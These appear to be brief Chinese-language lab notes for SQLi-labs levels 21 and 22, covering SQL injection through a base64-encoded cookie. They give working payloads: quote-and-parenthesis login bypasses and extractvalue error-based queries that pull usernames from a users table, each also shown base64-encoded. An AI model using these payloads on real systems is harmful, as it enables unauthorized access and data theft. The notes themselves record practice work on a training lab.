Less-21
Cookie处单引号+)注入,base64编码
Cookie:uname= YWRtaW4nKSM= 绕过了
直接搜索前面获取的信息,成功
admin') and extractvalue(1,concat(0x7e,(select username from users limit 0,1),0x7e))#
YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCB1c2VybmFtZSBmcm9tIHVzZXJzIGxpbWl0IDAsMSksMHg3ZSkpIw==
Less-22
Cookie 双引号报错注入 base64转码
admin”# 成功绕过
直接查询数据库内容
admin" and extractvalue(1,concat(0x7e,(select username from users limit 0,1),0x7e))# 成功
YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IHVzZXJuYW1lIGZyb20gdXNlcnMgbGltaXQgMCwxKSwweDdlKSkj